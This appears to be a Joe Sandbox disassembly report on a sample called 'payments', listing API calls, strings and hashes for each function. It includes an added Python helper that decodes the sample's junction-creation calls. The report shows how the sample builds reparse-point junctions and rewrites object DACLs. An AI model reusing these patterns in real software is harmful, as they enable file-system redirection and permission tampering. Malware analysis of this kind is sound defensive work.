                                                                                                                          • Opcode ID: b2711d3e0355ac79934f63f0b6edc127a77616fc2acd13fc14db84def3ab1f87
                                                                                                                          • Instruction ID: d5e086e72f1772c2a62e7a64c8777647b03d34fc75f4f29a2673494a7d952514
                                                                                                                          • Opcode Fuzzy Hash: b2711d3e0355ac79934f63f0b6edc127a77616fc2acd13fc14db84def3ab1f87
                                                                                                                          • Instruction Fuzzy Hash: 0712B2715083419FCB24EF64C885AAFBBF9BF99304F04491EF58993291DB30DA49DB62
                                                                                                                          APIs
                                                                                                                          • CharUpperBuffW.USER32(?,?), ref: 00CF71FC
                                                                                                                          • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 00CF7247
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1358665668.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.1358646713.0000000000C90000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D1D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D3E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.1358769798.0000000000D4A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.1358788526.0000000000D54000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c90000_payments.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: BuffCharMessageSendUpper
                                                                                                                          • String ID: @U=u$CHECK$COLLAPSE$EXISTS$EXPAND$GETITEMCOUNT$GETSELECTED$GETTEXT$GETTOTALCOUNT$ISCHECKED$SELECT$UNCHECK
                                                                                                                          • API String ID: 3974292440-383632319
                                                                                                                          • Opcode ID: 1d31bde82c26989bc2f542539cdc6ec1d7aa6cd446b496140e15297a1e0e57bd
                                                                                                                          • Instruction ID: 5ef721473305e05c82a798a12452430e50b45517714dd20d58098c74db6c79fd
                                                                                                                          • Opcode Fuzzy Hash: 1d31bde82c26989bc2f542539cdc6ec1d7aa6cd446b496140e15297a1e0e57bd
                                                                                                                          • Instruction Fuzzy Hash: 7C9194342087059FCB04EF24C891A6EB7A1BF55314F00495DF9966B3A3DB31ED4AEB92
                                                                                                                          APIs
                                                                                                                          • LoadImageW.USER32(00000000,?,00000001,?,?,00002010), ref: 00CFE5AB
                                                                                                                          • LoadLibraryExW.KERNEL32(?,00000000,00000032,?,?,00000001,?,?,?,00CF9808,?), ref: 00CFE607
                                                                                                                          • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 00CFE647
                                                                                                                          • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 00CFE68C
                                                                                                                          • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 00CFE6C3
                                                                                                                          • FreeLibrary.KERNEL32(?,00000004,?,?,?,00CF9808,?), ref: 00CFE6CF
                                                                                                                          • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 00CFE6DF
                                                                                                                          • DestroyIcon.USER32(?), ref: 00CFE6EE
                                                                                                                          • SendMessageW.USER32(?,00000170,00000000,00000000), ref: 00CFE70B
                                                                                                                          • SendMessageW.USER32(?,00000064,00000172,00000001), ref: 00CFE717
                                                                                                                            • Part of subcall function 00CB0FA7: __wcsicmp_l.LIBCMT ref: 00CB1030
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1358665668.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.1358646713.0000000000C90000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D1D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D3E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.1358769798.0000000000D4A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.1358788526.0000000000D54000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c90000_payments.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: Load$Image$IconLibraryMessageSend$DestroyExtractFree__wcsicmp_l
                                                                                                                          • String ID: .dll$.exe$.icl$@U=u
                                                                                                                          • API String ID: 1212759294-1639919054
                                                                                                                          • Opcode ID: 9d09b2971fe61ac1afc80d6966012155b6857c2770e432a60a9fcbb89879c341
                                                                                                                          • Instruction ID: 1f2a65fb0265d179c54924036c43627e3ce9a2ea1a1bda319823fddc279b925d
                                                                                                                          • Opcode Fuzzy Hash: 9d09b2971fe61ac1afc80d6966012155b6857c2770e432a60a9fcbb89879c341
                                                                                                                          • Instruction Fuzzy Hash: 4961C37150031DBAEB24DF64CC46FFE7BA8BB18724F108115FA25E61E0EB749A80DB61
                                                                                                                          APIs
                                                                                                                          • VariantInit.OLEAUT32(00000000), ref: 00CDAB3D
                                                                                                                          • VariantCopy.OLEAUT32(?,?), ref: 00CDAB46
                                                                                                                          • VariantClear.OLEAUT32(?), ref: 00CDAB52
                                                                                                                          • VariantTimeToSystemTime.OLEAUT32(?,?,?), ref: 00CDAC40
                                                                                                                          • __swprintf.LIBCMT ref: 00CDAC70
                                                                                                                          • VarR8FromDec.OLEAUT32(?,?), ref: 00CDAC9C
                                                                                                                          • VariantInit.OLEAUT32(?), ref: 00CDAD4D
                                                                                                                          • SysFreeString.OLEAUT32(00000016), ref: 00CDADDF
                                                                                                                          • VariantClear.OLEAUT32(?), ref: 00CDAE35
                                                                                                                          • VariantClear.OLEAUT32(?), ref: 00CDAE44
                                                                                                                          • VariantInit.OLEAUT32(00000000), ref: 00CDAE80
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1358665668.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.1358646713.0000000000C90000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D1D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D3E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.1358769798.0000000000D4A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.1358788526.0000000000D54000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c90000_payments.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: Variant$ClearInit$Time$CopyFreeFromStringSystem__swprintf
                                                                                                                          • String ID: %4d%02d%02d%02d%02d%02d$Default
                                                                                                                          • API String ID: 3730832054-3931177956
                                                                                                                          • Opcode ID: 78fa60b4b20892615da9016f4902a0ac22112f4f48a88666fec137f0db0e9625
                                                                                                                          • Instruction ID: 0efa96ef69f9b09d0859f22e264e6d8a3505b03057bcb462d2ec84617134eca2
                                                                                                                          • Opcode Fuzzy Hash: 78fa60b4b20892615da9016f4902a0ac22112f4f48a88666fec137f0db0e9625
                                                                                                                          • Instruction Fuzzy Hash: CFD10331600215EBCB109F66C884BAEB7B6FF09700F188457E6159F391DB74ED51EBA2
APIs
  • Part of subcall function 00C9936C: __swprintf.LIBCMT ref: 00C993AB
  • Part of subcall function 00C9936C: __itow.LIBCMT ref: 00C993DF
• CharLowerBuffW.USER32(?,?), ref: 00CDD292
• GetDriveTypeW.KERNEL32 ref: 00CDD2DF
• mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00CDD327
• mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00CDD35E
• mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00CDD38C
Strings
Memory Dump Source
• Source File: 00000000.00000002.1358665668.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
• Associated: 00000000.00000002.1358646713.0000000000C90000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1358726019.0000000000D1D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1358726019.0000000000D3E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1358769798.0000000000D4A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1358788526.0000000000D54000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_c90000_payments.jbxd
Similarity
• API ID: SendString$BuffCharDriveLowerType__itow__swprintf
• String ID: type cdaudio alias cd wait$ wait$close$close cd wait$closed$open$open $set cd door
• API String ID: 1148790751-4113822522
• Opcode ID: fe2200eec7ca842cddaf0d07874ba2e48393aa4b24e34a8d9cb12c636bfd07e7
• Instruction ID: c3110cd2acc3cfcfe1120eba77a15cb82ef4216b29e573de66097464a5b6167b
• Opcode Fuzzy Hash: fe2200eec7ca842cddaf0d07874ba2e48393aa4b24e34a8d9cb12c636bfd07e7
• Instruction Fuzzy Hash: 80511A71504305AFC700EF24C99296EB7F4EF98758F10885DF896672A1DB31EE0ADB92
APIs
• GetModuleHandleW.KERNEL32(00000000,?,00000FFF,00000016,00000000,?,?,00D03973,00000016,0000138C,00000016,?,00000016,00D2DDB4,00000000,?), ref: 00CD26F1
• LoadStringW.USER32(00000000,?,00D03973,00000016), ref: 00CD26FA
• GetModuleHandleW.KERNEL32(00000000,00000016,?,00000FFF,?,?,00D03973,00000016,0000138C,00000016,?,00000016,00D2DDB4,00000000,?,00000016), ref: 00CD271C
• LoadStringW.USER32(00000000,?,00D03973,00000016), ref: 00CD271F
• __swprintf.LIBCMT ref: 00CD276F
• __swprintf.LIBCMT ref: 00CD2780
• _wprintf.LIBCMT ref: 00CD2829
• MessageBoxW.USER32(00000000,?,?,00011010), ref: 00CD2840
Strings
Memory Dump Source
• Source File: 00000000.00000002.1358665668.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
• Associated: 00000000.00000002.1358646713.0000000000C90000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1358726019.0000000000D1D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1358726019.0000000000D3E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1358769798.0000000000D4A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1358788526.0000000000D54000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_c90000_payments.jbxd
Similarity
• API ID: HandleLoadModuleString__swprintf$Message_wprintf
• String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d (File "%s"):$Line %d:$^ ERROR
• API String ID: 618562835-2268648507
• Opcode ID: 5da045cf81735ac94379b60415ee249f4451e2f10537b266693deaa87159ac7b
• Instruction ID: c3d906660b944bda93d17711a34503726568e67c54df90de81faabfae62598a0
• Opcode Fuzzy Hash: 5da045cf81735ac94379b60415ee249f4451e2f10537b266693deaa87159ac7b
• Instruction Fuzzy Hash: D8413F72800218BBCF15FBE4DD9ADEEB778AF15340F100065B602B6192EA706F59EB60
APIs
• GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 00CDD0D8
• __swprintf.LIBCMT ref: 00CDD0FA
• CreateDirectoryW.KERNEL32(?,00000000), ref: 00CDD137
• CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000003,02200000,00000000), ref: 00CDD15C
• _memset.LIBCMT ref: 00CDD17B
• _wcsncpy.LIBCMT ref: 00CDD1B7
• DeviceIoControl.KERNEL32(00000000,000900A4,?,?,00000000,00000000,?,00000000), ref: 00CDD1EC
• CloseHandle.KERNEL32(00000000), ref: 00CDD1F7
• RemoveDirectoryW.KERNEL32(?), ref: 00CDD200
• CloseHandle.KERNEL32(00000000), ref: 00CDD20A
Strings
Memory Dump Source
• Source File: 00000000.00000002.1358665668.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
• Associated: 00000000.00000002.1358646713.0000000000C90000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1358726019.0000000000D1D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1358726019.0000000000D3E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1358769798.0000000000D4A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1358788526.0000000000D54000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_c90000_payments.jbxd
Similarity
• API ID: CloseCreateDirectoryHandle$ControlDeviceFileFullNamePathRemove__swprintf_memset_wcsncpy
• String ID: :$\$\??\%s
• API String ID: 2733774712-3457252023
• Opcode ID: 4ea3118f262efc1c32e61ad1f56b719dd9e2e78fd1fc43da12376496a08c2375
• Instruction ID: 7e6112a56314365fc766b44064b3a44cc39ea4ca4d512a4917485ef8435d5f34
• Opcode Fuzzy Hash: 4ea3118f262efc1c32e61ad1f56b719dd9e2e78fd1fc43da12376496a08c2375
• Instruction Fuzzy Hash: E83161B2900219ABDB219FA4DC49FEB77BDEF89740F1041A6F619D2260EB7097458B24
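The function above is readable once its raw arguments are decoded: CreateFileW is called with access 0x40000000 (GENERIC_WRITE), disposition 3 (OPEN_EXISTING) and flags 0x02200000 (FILE_FLAG_BACKUP_SEMANTICS | FILE_FLAG_OPEN_REPARSE_POINT) on the directory it has just created, and DeviceIoControl is then issued with control code 0x000900A4, which is CTL_CODE(FILE_DEVICE_FILE_SYSTEM, 41, METHOD_BUFFERED, FILE_SPECIAL_ACCESS), i.e. FSCTL_SET_REPARSE_POINT. Together with the "\??\%s" substitute-name format string and the RemoveDirectoryW cleanup on the failure path, this is the standard way to turn a directory into a junction. The Python helper below is an added example written for this page, not Joe Sandbox code and not code from the sample; it parses the call lines exactly as the report prints them and decodes the CreateFileW and DeviceIoControl arguments with documented Win32 values, so that the same reading can be done for other functions in the listing. The two input lines are copied from the record above; everything else (function names, the small decoding tables) is this example's own.

```python
"""Decode the hexadecimal arguments Joe Sandbox prints for CreateFileW and
DeviceIoControl so an API sequence can be read without a constant lookup.

Added helper for this report; not Joe Sandbox code and not from the sample.
The decoding tables hold documented Win32 values only.
"""
import re

# Constructed input: the two call lines from the report's listing for the
# function at 00CDD0D8..00CDD20A, copied verbatim.
SAMPLE_LINES = [
    "CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000003,02200000,00000000), ref: 00CDD15C",
    "DeviceIoControl.KERNEL32(00000000,000900A4,?,?,00000000,00000000,?,00000000), ref: 00CDD1EC",
]

# Documented Win32 constants (winnt.h / winbase.h / winioctl.h).
GENERIC_ACCESS = {0x10000000: "GENERIC_ALL", 0x20000000: "GENERIC_EXECUTE",
                  0x40000000: "GENERIC_WRITE", 0x80000000: "GENERIC_READ"}
SHARE_MODE = {0x1: "FILE_SHARE_READ", 0x2: "FILE_SHARE_WRITE", 0x4: "FILE_SHARE_DELETE"}
CREATION_DISPOSITION = {1: "CREATE_NEW", 2: "CREATE_ALWAYS", 3: "OPEN_EXISTING",
                        4: "OPEN_ALWAYS", 5: "TRUNCATE_EXISTING"}
FILE_FLAGS = {0x00200000: "FILE_FLAG_OPEN_REPARSE_POINT",
              0x02000000: "FILE_FLAG_BACKUP_SEMANTICS",
              0x04000000: "FILE_FLAG_DELETE_ON_CLOSE",
              0x20000000: "FILE_FLAG_NO_BUFFERING",
              0x40000000: "FILE_FLAG_OVERLAPPED",
              0x80000000: "FILE_FLAG_WRITE_THROUGH"}
DEVICE_TYPES = {0x9: "FILE_DEVICE_FILE_SYSTEM"}
METHODS = {0: "METHOD_BUFFERED", 1: "METHOD_IN_DIRECT", 2: "METHOD_OUT_DIRECT", 3: "METHOD_NEITHER"}
# Function numbers of the reparse-point FSCTLs on FILE_DEVICE_FILE_SYSTEM.
FSCTL_FUNCTIONS = {41: "FSCTL_SET_REPARSE_POINT", 42: "FSCTL_GET_REPARSE_POINT",
                   43: "FSCTL_DELETE_REPARSE_POINT"}

# One report line: "<api>.<module>(<args>), ref: <addr>"; the argument list is
# absent when the plugin could not recover the arguments.
CALL_RE = re.compile(r"(?P<api>\w+)\.(?P<mod>\w+)(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)")


def parse_call(line):
    m = CALL_RE.search(line)
    if m is None:
        return None
    raw = m.group("args")
    args = [] if raw is None else [a.strip() for a in raw.split(",")]
    return {"api": m.group("api"), "module": m.group("mod"), "args": args, "ref": m.group("ref")}


def arg_value(arg):
    """'?' marks an unrecovered value; negatives are printed like '-00000001'."""
    if arg in ("", "?"):
        return None
    return int(arg, 16) & 0xFFFFFFFF


def decode_flags(value, table):
    """Split a bitmask into known flag names (ascending bit order) and undecoded bits."""
    names = [name for bit, name in sorted(table.items()) if value & bit]
    known = sum(bit for bit in table if value & bit)
    return names, value & ~known & 0xFFFFFFFF


def decode_ctl_code(code):
    """Undo CTL_CODE(): (DeviceType << 16) | (Access << 14) | (Function << 2) | Method."""
    device = code >> 16
    function = (code >> 2) & 0xFFF
    name = FSCTL_FUNCTIONS.get(function) if device == 0x9 else None
    return {"device_type": device, "device_name": DEVICE_TYPES.get(device, "unknown"),
            "required_access": (code >> 14) & 0x3, "function": function,
            "method": METHODS[code & 0x3], "name": name}


def decode_createfile(args):
    """args follow CreateFileW's parameter order; index 0 is the file name."""
    access, _ = decode_flags(arg_value(args[1]) or 0, GENERIC_ACCESS)
    share, _ = decode_flags(arg_value(args[2]) or 0, SHARE_MODE)
    flags, rest = decode_flags(arg_value(args[5]) or 0, FILE_FLAGS)
    return {"access": access, "share": share,
            "disposition": CREATION_DISPOSITION.get(arg_value(args[4]), "unknown"),
            "flags": flags, "undecoded_flag_bits": rest}


def describe_sequence(lines):
    """Decode each call and flag CreateFile(OPEN_REPARSE_POINT) followed by
    FSCTL_SET_REPARSE_POINT, the pattern that turns a directory into a junction."""
    notes, verdict, opened_reparse = [], None, False
    for line in lines:
        call = parse_call(line)
        if call is None:
            continue
        if call["api"] == "CreateFileW" and len(call["args"]) >= 6:
            d = decode_createfile(call["args"])
            notes.append(f"{call['ref']}: CreateFileW {d['access']} {d['disposition']} {d['flags']}")
            opened_reparse = "FILE_FLAG_OPEN_REPARSE_POINT" in d["flags"]
        elif call["api"] == "DeviceIoControl" and len(call["args"]) >= 2:
            code = arg_value(call["args"][1])
            if code is None:
                continue
            d = decode_ctl_code(code)
            notes.append(f"{call['ref']}: DeviceIoControl {code:#010x} -> {d['name'] or 'unknown'} "
                         f"({d['device_name']}, function {d['function']}, {d['method']})")
            if opened_reparse and d["name"] == "FSCTL_SET_REPARSE_POINT":
                verdict = "reparse point creation on a handle opened with FILE_FLAG_OPEN_REPARSE_POINT"
    return notes, verdict


if __name__ == "__main__":
    notes, verdict = describe_sequence(SAMPLE_LINES)
    for note in notes:
        print(note)
    print("verdict:", verdict)
```

Feed `describe_sequence` the API lines of any record in this listing; calls it does not decode are skipped, and bits that are not in the small tables are returned separately in `undecoded_flag_bits` rather than silently dropped, so an unexpected flag is visible instead of hidden.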
APIs
• __wsplitpath.LIBCMT ref: 00CE076F
• _wcscat.LIBCMT ref: 00CE0787
• _wcscat.LIBCMT ref: 00CE0799
• GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00CE07AE
• SetCurrentDirectoryW.KERNEL32(?), ref: 00CE07C2
• GetFileAttributesW.KERNEL32(?), ref: 00CE07DA
• SetFileAttributesW.KERNEL32(?,00000000), ref: 00CE07F4
• SetCurrentDirectoryW.KERNEL32(?), ref: 00CE0806
Strings
Memory Dump Source
• Source File: 00000000.00000002.1358665668.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
• Associated: 00000000.00000002.1358646713.0000000000C90000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1358726019.0000000000D1D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1358726019.0000000000D3E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1358769798.0000000000D4A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1358788526.0000000000D54000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_c90000_payments.jbxd
Similarity
• API ID: CurrentDirectory$AttributesFile_wcscat$__wsplitpath
• String ID: *.*
• API String ID: 34673085-438819550
• Opcode ID: f1c00e04ad5d0af482b32a49f93294d17051c46c32e47d88e2dc838a68f30633
• Instruction ID: bfd65033cf294ee93d80d0498cf2e3daab1371011213cd1e9726279b26267bab
• Opcode Fuzzy Hash: f1c00e04ad5d0af482b32a49f93294d17051c46c32e47d88e2dc838a68f30633
• Instruction Fuzzy Hash: 3E81B4715043819FCB24DF26C845AAEB3E8FBC4314F24882EF895C7251E774DA95CB92
APIs
  • Part of subcall function 00CAB34E: GetWindowLongW.USER32(?,000000EB), ref: 00CAB35F
• PostMessageW.USER32(?,00000111,00000000,00000000), ref: 00CFEF3B
• GetFocus.USER32 ref: 00CFEF4B
• GetDlgCtrlID.USER32(00000000), ref: 00CFEF56
• _memset.LIBCMT ref: 00CFF081
• GetMenuItemInfoW.USER32 ref: 00CFF0AC
• GetMenuItemCount.USER32(00000000), ref: 00CFF0CC
• GetMenuItemID.USER32(?,00000000), ref: 00CFF0DF
• GetMenuItemInfoW.USER32(00000000,-00000001,00000001,?), ref: 00CFF113
• GetMenuItemInfoW.USER32(00000000,?,00000001,?), ref: 00CFF15B
• CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 00CFF193
• DefDlgProcW.USER32(?,00000111,?,?,?,?,?,?,?), ref: 00CFF1C8
Strings
Memory Dump Source
• Source File: 00000000.00000002.1358665668.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
• Associated: 00000000.00000002.1358646713.0000000000C90000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1358726019.0000000000D1D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1358726019.0000000000D3E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1358769798.0000000000D4A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1358788526.0000000000D54000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_c90000_payments.jbxd
Similarity
• API ID: ItemMenu$Info$CheckCountCtrlFocusLongMessagePostProcRadioWindow_memset
• String ID: 0
• API String ID: 1296962147-4108050209
• Opcode ID: 2cff7c6d25d77627057d1f92c5bcd17ef7a65671398ed06910132fcd341e8a96
• Instruction ID: 54b4c508a0fcf3ffdfd53c4191f23f6b2cf5d96756cb47d3bfa6939a9b9dd206
• Opcode Fuzzy Hash: 2cff7c6d25d77627057d1f92c5bcd17ef7a65671398ed06910132fcd341e8a96
• Instruction Fuzzy Hash: 3A814A71508309AFD760CF15C884ABBBBE5EF88314F10852DFAA597291DB70D906DB62
                                                                                                                          APIs
                                                                                                                            • Part of subcall function 00CCABBB: GetUserObjectSecurity.USER32(?,?,?,00000000,?), ref: 00CCABD7
                                                                                                                            • Part of subcall function 00CCABBB: GetLastError.KERNEL32(?,00CCA69F,?,?,?), ref: 00CCABE1
                                                                                                                            • Part of subcall function 00CCABBB: GetProcessHeap.KERNEL32(00000008,?,?,00CCA69F,?,?,?), ref: 00CCABF0
                                                                                                                            • Part of subcall function 00CCABBB: HeapAlloc.KERNEL32(00000000,?,00CCA69F,?,?,?), ref: 00CCABF7
                                                                                                                            • Part of subcall function 00CCABBB: GetUserObjectSecurity.USER32(?,?,00000000,?,?), ref: 00CCAC0E
                                                                                                                            • Part of subcall function 00CCAC56: GetProcessHeap.KERNEL32(00000008,00CCA6B5,00000000,00000000,?,00CCA6B5,?), ref: 00CCAC62
                                                                                                                            • Part of subcall function 00CCAC56: HeapAlloc.KERNEL32(00000000,?,00CCA6B5,?), ref: 00CCAC69
                                                                                                                            • Part of subcall function 00CCAC56: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00CCA6B5,?), ref: 00CCAC7A
                                                                                                                          • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00CCA8CB
                                                                                                                          • _memset.LIBCMT ref: 00CCA8E0
                                                                                                                          • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 00CCA8FF
                                                                                                                          • GetLengthSid.ADVAPI32(?), ref: 00CCA910
                                                                                                                          • GetAce.ADVAPI32(?,00000000,?), ref: 00CCA94D
                                                                                                                          • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00CCA969
                                                                                                                          • GetLengthSid.ADVAPI32(?), ref: 00CCA986
                                                                                                                          • GetProcessHeap.KERNEL32(00000008,-00000008), ref: 00CCA995
                                                                                                                          • HeapAlloc.KERNEL32(00000000), ref: 00CCA99C
                                                                                                                          • GetLengthSid.ADVAPI32(?,00000008,?), ref: 00CCA9BD
                                                                                                                          • CopySid.ADVAPI32(00000000), ref: 00CCA9C4
                                                                                                                          • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 00CCA9F5
                                                                                                                          • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 00CCAA1B
                                                                                                                          • SetUserObjectSecurity.USER32(?,00000004,?), ref: 00CCAA2F
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1358665668.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.1358646713.0000000000C90000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D1D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D3E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.1358769798.0000000000D4A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.1358788526.0000000000D54000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c90000_payments.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: HeapSecurity$AllocDescriptorLengthObjectProcessUser$Dacl$CopyErrorInformationInitializeLast_memset
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 3996160137-0
                                                                                                                          APIs
                                                                                                                          • GetDC.USER32(00000000), ref: 00CE9E36
                                                                                                                          • CreateCompatibleBitmap.GDI32(00000000,00000007,?), ref: 00CE9E42
                                                                                                                          • CreateCompatibleDC.GDI32(?), ref: 00CE9E4E
                                                                                                                          • SelectObject.GDI32(00000000,?), ref: 00CE9E5B
                                                                                                                          • StretchBlt.GDI32(00000006,00000000,00000000,00000007,?,?,?,?,00000007,?,00CC0020), ref: 00CE9EAF
                                                                                                                          • GetDIBits.GDI32(00000006,?,00000000,00000000,00000000,?,00000000), ref: 00CE9EEB
                                                                                                                          • GetDIBits.GDI32(00000006,?,00000000,?,00000000,00000028,00000000), ref: 00CE9F0F
                                                                                                                          • SelectObject.GDI32(00000006,?), ref: 00CE9F17
                                                                                                                          • DeleteObject.GDI32(?), ref: 00CE9F20
                                                                                                                          • DeleteDC.GDI32(00000006), ref: 00CE9F27
                                                                                                                          • ReleaseDC.USER32(00000000,?), ref: 00CE9F32
                                                                                                                          Similarity
                                                                                                                          • API ID: Object$BitsCompatibleCreateDeleteSelect$BitmapReleaseStretch
                                                                                                                          • String ID: (
                                                                                                                          • API String ID: 2598888154-3887548279
                                                                                                                          Similarity
                                                                                                                          • API ID: LoadString__swprintf_wprintf
                                                                                                                          • String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
                                                                                                                          • API String ID: 2889450990-2391861430
                                                                                                                          Similarity
                                                                                                                          • API ID: LoadString__swprintf_wprintf
                                                                                                                          • String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
                                                                                                                          • API String ID: 2889450990-3420473620
                                                                                                                          APIs
                                                                                                                          • timeGetTime.WINMM ref: 00CD7794
                                                                                                                            • Part of subcall function 00CADC38: timeGetTime.WINMM(?,753DB400,00D058AB), ref: 00CADC3C
                                                                                                                          • Sleep.KERNEL32(0000000A), ref: 00CD77C0
                                                                                                                          • EnumThreadWindows.USER32(?,Function_00047744,00000000), ref: 00CD77E4
                                                                                                                          • FindWindowExW.USER32(?,00000000,BUTTON,00000000), ref: 00CD7806
                                                                                                                          • SetActiveWindow.USER32 ref: 00CD7825
                                                                                                                          • SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 00CD7833
                                                                                                                          • SendMessageW.USER32(00000010,00000000,00000000), ref: 00CD7852
                                                                                                                          • Sleep.KERNEL32(000000FA), ref: 00CD785D
                                                                                                                          • IsWindow.USER32 ref: 00CD7869
                                                                                                                          • EndDialog.USER32(00000000), ref: 00CD787A
                                                                                                                          Similarity
                                                                                                                          • API ID: Window$MessageSendSleepTimetime$ActiveDialogEnumFindThreadWindows
                                                                                                                          • String ID: @U=u$BUTTON
